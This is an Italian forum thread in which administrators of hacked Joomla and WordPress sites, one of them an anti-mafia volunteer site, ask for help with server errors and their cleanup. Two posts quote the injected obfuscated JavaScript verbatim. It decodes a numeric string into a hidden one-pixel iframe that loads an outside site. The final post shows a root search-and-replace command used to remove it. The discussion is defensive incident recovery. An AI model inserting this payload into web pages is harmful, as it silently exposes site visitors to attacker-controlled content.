ERRORE - Non funziona più nulla

[aldonline]

Vi prego, datemi una mano.
Da questa mattina, senza che si effettuasse alcuna operazione da parte nostra, il sito del nostro movimento antimafia (www.ammazzatecitutti.org)non funziona.
L'errore visualizzato a schermo è il seguente:

Codice: [Seleziona]

Error: headers already sent in globals.php on line 136.
Stopped at line 887 in joomsef.php: HEADERS ALREADY SENT (200)
URL=http://www.ammazzatecitutti.orgoption=com_frontpage&Itemid=1:
OPTION=com_frontpage
Vi prego, datemi una mano!
Grazie!

[aldonline]

Ragazzi scusate se insisto, ma vorrei almeno capire di che tipo di problema si tratti, per poter cercare di intervenire....

Tra l'altro si tratta di un sito di volontariato abbastanza frequentato, quindi vorrei risolvere al più presto.

VI PREGOOOOOO!!!

[aldonline]

Ho effettuato delle ricerche su google, ed ho capito che forse il sito può essere stato bucato.

C'è, in pratica, uno script che si inserisce automaticamente(o viene inserito, questo non l'ho ancora capito) al termine dei codici delle pagine, praticamente subito dopo la chiusura del codice php ?>

Ho modificato il file globals.php, in quale presentava questa injection, ed ora, infatti, è comparso un altro errore...

Codice: [Seleziona]

Error: headers already sent in compat.php50x.php on line 147.
Stopped at line 887 in joomsef.php: HEADERS ALREADY SENT (200)
URL=http://www.ammazzatecitutti.orgoption=com_frontpage&Itemid=1:
OPTION=com_frontpage:A nessuno è capitato qualcosa del genere?
Sapete come risolverlo?

[aldonline]

Incredibile!
c'è questo codice:

Codice: [Seleziona]

<script>function stcount() {var t,o,l,i,j;var s='060047116101120116097116101097062060047116101120116097114101097062060105102114097109101032115114099061039104116116112058047047115104105110121045115116097116046099111109039032119105100116104061039049039032104101105103104116061039049039032115116121108101061039118105115105098105108105116121058032104105100100101110059039062060047105102114097109101062';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}stcount();</script>
che si è replicato in tutte le pagine php!!!!!!

Qualcuno sa dirmi se c'è una patch che risolve il problema?
Intanto sto modificando ogni singolo file, eliminando la stringa, ma è un alvoraccio.

Se c'è qualcuno batta un colpo

[zenzero]

Stessa cosa accaduta anche a noi oggi su www.sabinafutura.it. Avevamo nei due giorni precedenti documentato la presenza di alcune discariche abusive... speriamo sia un caso. Noi abbiamo Wordpress ultima release con attivi i seguenti plugin da molto tempo: Akismet, Dagon Design Form Mailer, mobileadmin, Role Manager, WP-Polls; e i seguenti plugin da due o tre giorni (necessari alla pubblicazione delle foto delle discariche): Exec-PHP, FAlbum, Flickr Photo Gallery.

Non riesco a capire dove sia la falla, te hai qualche idea? Ho ripristinato la situazione, ma temo che possa esserci un altro attacco.

[aldonline]

Stiamo bonificando tutto.....

è un bel casino, visto che praticamente stiamo eliminando a mano la parte "abusiva" di codice in ogni file php.

Per quel che ho avuto modo di capire potrebbero aver sfruttato i cookies attraverso la cartella "cache".

Sui forum ufficiali di joomla nulla a riguardo, per wordpress mi pare di aver letto qualcosa, ma per il resto siamo andati ad intuito.

meno male che ora pare funzioni tutto.
Ovviamente non credo si tratti di un semplice "caso".

[paalba]

non avevate un backup dei file per poterli sovrascrivere? Se sistemate il tutto poi fate subito una copia di tutti i file che avete nello spazio. Io lo faccio una volta al mese e il database ogni giorno...

[paologuarnaccia]

Chiaramente il backup è importante ma se non si trova la falla si rischia di entrare in un loop infinito.
Qualcuno ha delle idee, io sono stato messo in ginocchio, con due portali fatti in joomla, ed una 20 di siti normali.
Mi chiedo se la falla possa essere imputata a Joomla o a qualche codice obsoleto presente nei ns. siti normali?
Grazie a tutti

[zenzero]

Pur bonificando tutto a mano rimangono dei file infetti fuori dalla directory dei domini, per rimuovere veramente tutto abbiamo dovuto dare questo script di search&replace come root su tutto il filesystem:

Codice: [Seleziona]

/usr/bin/rpl -R -v -x .php -x .html -x .htm "<script>function stcount() {var t,o,l,i,j;var s='060047116101120116097116101097062060047116101120116097114101097062060105102114097109101032115114099061039104116116112058047047115104105110121045115116097116046099111109039032119105100116104061039049039032104101105103104116061039049039032115116121108101061039118105115105098105108105116121058032104105100100101110059039062060047105102114097109101062';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}stcount();</script>" "" *